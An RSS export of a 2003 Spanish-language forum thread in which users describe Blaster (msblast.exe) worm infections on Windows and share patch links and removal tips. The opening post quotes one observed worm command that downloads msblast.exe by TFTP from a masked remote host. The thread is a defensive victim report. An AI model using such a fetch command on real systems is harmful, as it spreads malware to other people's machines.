<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Stories to keep you awake, msblast.exe]]></title><description><![CDATA[<p><i><b>This post is being processed/translated. The original version will be shown:</b></i></p><p dir="auto">Bueno parece que la suerte no va conmigo…..</p>
<p dir="auto">Estoy trankilamente navegando cuando de pronto un mensaje, la conexion remota ... (RPC) ha fallado, el sistema de apagado ha sido inicador por una tal NT authority\system <img src="https://foro.hardlimit.com/en/assets/plugins/nodebb-plugin-emoji/emoji/android/1f615.png?v=11392bd8dbb" class="not-responsive emoji emoji-android emoji--confused" style="height:23px;width:auto;vertical-align:middle" title=":confused:" alt="😕" /> :susto: . Vale, voy a revisar el servicio de control remoto, asi como desactivar el escritorio remoto y tal. Cual es mi sorpresa cuando reviso este servicio, y en iniciar sesion estaba el tal nt authority\system con su contraseña correspondiente, lo borro y pongo inicio local y tal. Me da por revisar TODOS los servicios manuales y automaticos y en la mayoria ya estaba este "intruso", tales como servicio DNS, DHCP, cliente WEB, Registro remoto.... la mayoria de redes, pues nada los pongo todos como locales y parece que acepta, esto claro despues de reiniciar y apagar el cable modem.</p>
<p dir="auto">Luego reviso el registro, a ver que arranca y veo que inicia el tal msblast.exe, que como el proceso lo he parado varias veces parece que utiliza el servicio de actualizaciones automaticas (el ke tengo desactivado) para reconnectarse cuando lo kitas, se archiva en system32. Cuando este proceso esta en memoria no te deja iniciar servicios de red y lo que hace es (al menos lo que he experimentado) hacer fallar el acceso remoto (RPC) y configurar el mismo para que ante un fallo se reinicie la computadora, algo muy molesto si lo hace en menos de 1 minuto cada vez que reinicias. He deshabilitado un monton de servicios de red, como todos los accesos remotos y el registro remoto, he borrado la clave del registro, el archivo en msblast.exe , pero si no abro el simbolo del sistema justo al iniciar, se reconecta "alguien" pidiendo el msblast.exe a través del simbolo del sistema, algo así como: cmd.exe tlftp <a href="http://xxx.xxx.xxx.xxx" rel="nofollow ugc">xxx.xxx.xxx.xxx</a> get msblast.exe (se ve un par de segundos) y volvemos a la jugada.</p>
<p dir="auto">Curioso no? algun "gracioso" jugueteando con la red? troyano? virus? (el antivirus al menos nolo detecta)</p>
<p dir="auto">Bueno pues si a alguien le pasa aki dejo mi experiencia.</p>
<p dir="auto">Salu2!</p>
<p dir="auto">Editado: Existe otra rama en el foro windows <a href="http://www.hardlimit.com/forum/showthread.php?s=&amp;threadid=20988" rel="nofollow ugc">http://www.hardlimit.com/forum/showthread.php?s=&amp;threadid=20988</a></p>
]]></description><link>https://foro.hardlimit.com/en/topic/17655/historias-para-no-dormir-msblast-exe</link><generator>RSS for Node</generator><lastBuildDate>Mon, 06 Apr 2026 02:18:19 GMT</lastBuildDate><atom:link href="https://foro.hardlimit.com/en/topic/17655.rss" rel="self" type="application/rss+xml"/><pubDate>Mon, 11 Aug 2003 22:36:43 GMT</pubDate><ttl>60</ttl><item><title><![CDATA[Reply to Stories to keep you awake, msblast.exe on Sun, 31 Aug 2003 17:05:06 GMT]]></title><description><![CDATA[<p><i><b>This post is being processed/translated. The original version will be shown:</b></i></p><p dir="auto">Pues a mi no me ha entrado, pero me han pringao y mañana se lo meteré a mi amiga (el parche malpensaos:D), como tiene una conexión de 56Kb no da tiempo a que se baje el parche:muerto:</p>
]]></description><link>https://foro.hardlimit.com/en/post/198920</link><guid isPermaLink="true">https://foro.hardlimit.com/en/post/198920</guid><dc:creator><![CDATA[bluesman]]></dc:creator><pubDate>Sun, 31 Aug 2003 17:05:06 GMT</pubDate></item><item><title><![CDATA[Reply to Stories to keep you awake, msblast.exe on Wed, 13 Aug 2003 13:07:20 GMT]]></title><description><![CDATA[<p><i><b>This post is being processed/translated. The original version will be shown:</b></i></p><p dir="auto">toko madera ke a mi no me a tokado todavia :risitas:</p>
<p dir="auto">Saludos</p>
]]></description><link>https://foro.hardlimit.com/en/post/194904</link><guid isPermaLink="true">https://foro.hardlimit.com/en/post/194904</guid><dc:creator><![CDATA[FOBOS]]></dc:creator><pubDate>Wed, 13 Aug 2003 13:07:20 GMT</pubDate></item><item><title><![CDATA[Reply to Stories to keep you awake, msblast.exe on Tue, 12 Aug 2003 17:09:13 GMT]]></title><description><![CDATA[<p><i><b>This post is being processed/translated. The original version will be shown:</b></i></p><p dir="auto">Aqui he visto este interesante articulo y guia para saber sobre este tema de este peligroso virus gusano</p>
<p dir="auto"><a href="http://www.adslayuda.com/displayarticle939.html" rel="nofollow ugc">http://www.adslayuda.com/displayarticle939.html</a></p>
<p dir="auto">para más noticias, información y otros links interesantes sobre este tema</p>
<p dir="auto">mirad en esta otra rama</p>
<p dir="auto"><a href="http://www.hardlimit.com/forum/showthread.php?s=&amp;postid=170236#post170236" rel="nofollow ugc">http://www.hardlimit.com/forum/showthread.php?s=&amp;postid=170236#post170236</a></p>
]]></description><link>https://foro.hardlimit.com/en/post/194782</link><guid isPermaLink="true">https://foro.hardlimit.com/en/post/194782</guid><dc:creator><![CDATA[SpaceRay]]></dc:creator><pubDate>Tue, 12 Aug 2003 17:09:13 GMT</pubDate></item><item><title><![CDATA[Reply to Stories to keep you awake, msblast.exe on Tue, 12 Aug 2003 15:34:53 GMT]]></title><description><![CDATA[<p><i><b>This post is being processed/translated. The original version will be shown:</b></i></p><p dir="auto">En el pc q tenemos en el restaurante para cobrar las mesas tb ha pillado el dichoso gusano y mira q se conecta poca a la red…</p>
]]></description><link>https://foro.hardlimit.com/en/post/194764</link><guid isPermaLink="true">https://foro.hardlimit.com/en/post/194764</guid><dc:creator><![CDATA[krampak]]></dc:creator><pubDate>Tue, 12 Aug 2003 15:34:53 GMT</pubDate></item><item><title><![CDATA[Reply to Stories to keep you awake, msblast.exe on Tue, 12 Aug 2003 12:57:30 GMT]]></title><description><![CDATA[<p><i><b>This post is being processed/translated. The original version will be shown:</b></i></p><p dir="auto">En barrapunto tb se hacen eco:<br />
<a href="http://barrapunto.com/articles/03/08/12/1046223.shtml" rel="nofollow ugc">http://barrapunto.com/articles/03/08/12/1046223.shtml</a></p>
]]></description><link>https://foro.hardlimit.com/en/post/194736</link><guid isPermaLink="true">https://foro.hardlimit.com/en/post/194736</guid><dc:creator><![CDATA[josefu]]></dc:creator><pubDate>Tue, 12 Aug 2003 12:57:30 GMT</pubDate></item><item><title><![CDATA[Reply to Stories to keep you awake, msblast.exe on Tue, 12 Aug 2003 08:31:23 GMT]]></title><description><![CDATA[<p><i><b>This post is being processed/translated. The original version will be shown:</b></i></p><p dir="auto">Ayer volví a conectarme al IRC después de mucho tiempo y en un par de horas atendí a 3 ó 4 personas sobre el tema. Gracias a estar presente en una conversación sobre esto pude reconocer que cojones era (no soy usuario de Windows en casa) y ayudarles.</p>
<p dir="auto">Para no tener que repetir lo mismo cien veces he escrito esta mañana un pequeño texto sobre el tema ( <a href="http://confrontacion.blogalia.com/historias/10542" rel="nofollow ugc">http://confrontacion.blogalia.com/historias/10542</a> ) que os pego aquí mismo:</p>
<blockquote>
<p dir="auto">Debido a la magnitud del problema con el gusano msblast voy a explicaros un poco en que consiste, porqué estais infectados y que debeis hacer (tanto si estais infectados como si no).</p>
<p dir="auto">El msblast (<a href="http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html" rel="nofollow ugc">w32.blaster.worm</a>) es un gusano (un virus que se propaga él solito por internet) que aprovecha una vulnerabilidad de varios sistemas Windows (NT4, 2000, XP, Server 2003) para infectar sistemas y autopropagarse. Una vez estás infectado intenta un ataque DoS sobre <a href="http://windowsupdate.com" rel="nofollow ugc">windowsupdate.com</a> para que no puedas actualizar tu sistema con el parche correspondiente a la vulnerabilidad aprovechada.</p>
<p dir="auto">Esta vulnerabilidad fue reconocida por Microsoft <a href="http://www.secunia.com/advisories/9287/" rel="nofollow ugc">el 16 de Julio</a> y hay varios parches. Los que os pueden interesar seguramente sean estos dos:</p>
<p dir="auto">· <a href="http://microsoft.com/downloads/details.aspx?FamilyId=2354406C-C5B6-44AC-9532-3DE40F69C074&amp;displaylang=es" rel="nofollow ugc">Parche para XP</a>.<br />
· <a href="http://microsoft.com/downloads/details.aspx?FamilyId=C8B8A846-F541-4C15-8C9F-220354449117&amp;displaylang=es" rel="nofollow ugc">Parche para Windows 2000</a> (requiere ServicePack 3 ó 4).</p>
<p dir="auto">Si no estabais infectados (un síntoma de la infección es el reinicio cada 5 minutos de la máquina) esto evitará que os infecteis, aunque se rumorea que el parche para Windows 2000 no arregla del todo la vulnerabilidad.</p>
<p dir="auto">Si estabais infectados esto evitará que os volvais a infectar una vez hayais limpiado vuestra máquina. Para limpiarla podeis usar <a href="http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.removal.tool.html" rel="nofollow ugc">este programa</a> de Symantec. Aunque si os gusta hacerlo a mano básicamente se trata de buscar las entradas del registro que hagan referencia a msblast y borrarlas. Después reiniciamos y borramos el ejecutable. Si hemos aplicado el parche de Microsoft ya podemos estar seguros de que msblast no nos hará daño de nuevo.</p>
<p dir="auto">¡Ojo! Los antivirus que no estén actualizados a 11 de Agosto no lo detectarán.</p>
<p dir="auto">¡Ojo! Es <strong>imperativa</strong> la aplicación del parche esteis o no infectados. Se prevee la aparición de otros gusanos que podrían ser más destructivos que msblast que, de hecho, no tiene ningún payload destructivo conocido.</p>
<p dir="auto">P.D.: Podría aprovechar para hacer apología de otros sistemas operativos <img src="https://foro.hardlimit.com/en/assets/plugins/nodebb-plugin-emoji/emoji/android/1f642.png?v=11392bd8dbb" class="not-responsive emoji emoji-android emoji--slightly_smiling_face" style="height:23px;width:auto;vertical-align:middle" title=":)" alt="🙂" /> pero en este caso gran parte de la culpa es del usuario <strong>que no actualiza el sistema</strong>. A partir de ahora espero que cojan la costumbre de actualizar sus sistemas (<a href="http://www.windowsupdate.com" rel="nofollow ugc">windowsupdate.com</a> si son ustedes usuarios de Windows).</p>
</blockquote>
<p dir="auto">Teneis permiso para copiarlo, ya sea entero o a trozos sin tener que pedir permiso ni citar fuentes. Aunque si me citais como fuente estaré más contento :risitas:<br />
Tampoco os perdais los comentarios que vayan saliendo pues suelen ser interesantes <img src="https://foro.hardlimit.com/en/assets/plugins/nodebb-plugin-emoji/emoji/android/1f642.png?v=11392bd8dbb" class="not-responsive emoji emoji-android emoji--slightly_smiling_face" style="height:23px;width:auto;vertical-align:middle" title=":)" alt="🙂" /></p>
]]></description><link>https://foro.hardlimit.com/en/post/194693</link><guid isPermaLink="true">https://foro.hardlimit.com/en/post/194693</guid><dc:creator><![CDATA[Mystix]]></dc:creator><pubDate>Tue, 12 Aug 2003 08:31:23 GMT</pubDate></item><item><title><![CDATA[Reply to Stories to keep you awake, msblast.exe on Mon, 11 Aug 2003 23:04:37 GMT]]></title><description><![CDATA[<p><i><b>This post is being processed/translated. The original version will be shown:</b></i></p><p dir="auto">Nà Hombre, es mas, yo Me he divertido eXplicandoselo a 11 personas a la veZ x el messenger <img src="https://foro.hardlimit.com/en/assets/plugins/nodebb-plugin-emoji/emoji/android/1f604.png?v=11392bd8dbb" class="not-responsive emoji emoji-android emoji--smile" style="height:23px;width:auto;vertical-align:middle" title=":D" alt="😄" /> <img src="https://foro.hardlimit.com/en/assets/plugins/nodebb-plugin-emoji/emoji/android/1f604.png?v=11392bd8dbb" class="not-responsive emoji emoji-android emoji--smile" style="height:23px;width:auto;vertical-align:middle" title=":D" alt="😄" /></p>
]]></description><link>https://foro.hardlimit.com/en/post/194651</link><guid isPermaLink="true">https://foro.hardlimit.com/en/post/194651</guid><dc:creator><![CDATA[DeKoDe]]></dc:creator><pubDate>Mon, 11 Aug 2003 23:04:37 GMT</pubDate></item><item><title><![CDATA[Reply to Stories to keep you awake, msblast.exe on Mon, 11 Aug 2003 22:56:32 GMT]]></title><description><![CDATA[<p><i><b>This post is being processed/translated. The original version will be shown:</b></i></p><p dir="auto">Juas, acabo de hablar con mas gente, y todos les pasa lo mismo.</p>
<p dir="auto">Dekode tienes razon, un wen agujerito del XP, vaya tarde ma dao el pc hoy :rabieta:</p>
<p dir="auto">En fin, Un saludo y Thanks.</p>
]]></description><link>https://foro.hardlimit.com/en/post/194648</link><guid isPermaLink="true">https://foro.hardlimit.com/en/post/194648</guid><dc:creator><![CDATA[VoRoK]]></dc:creator><pubDate>Mon, 11 Aug 2003 22:56:32 GMT</pubDate></item><item><title><![CDATA[Reply to Stories to keep you awake, msblast.exe on Mon, 11 Aug 2003 22:53:38 GMT]]></title><description><![CDATA[<p><i><b>This post is being processed/translated. The original version will be shown:</b></i></p><p dir="auto">jeje, pueS ya eres la 12ª peRsona que conozCo a la que le Pasa(a mi no me a pasaDo:D ), resulta que esto no es mas que un aguJero d seGuridad en nueStro queriDo Windows xP :risitas:<br />
Puedes solucionarLo bajandoTe esTE parcHe: <a href="http://microsoft.com/downloads/details.aspx?displaylang=es&amp;FamilyID=2354406C-C5B6-44AC-9532-3DE40F69C074" rel="nofollow ugc">ParCHe</a> Y un Aplauso para M$ :D:D:D</p>
]]></description><link>https://foro.hardlimit.com/en/post/194646</link><guid isPermaLink="true">https://foro.hardlimit.com/en/post/194646</guid><dc:creator><![CDATA[DeKoDe]]></dc:creator><pubDate>Mon, 11 Aug 2003 22:53:38 GMT</pubDate></item></channel></rss>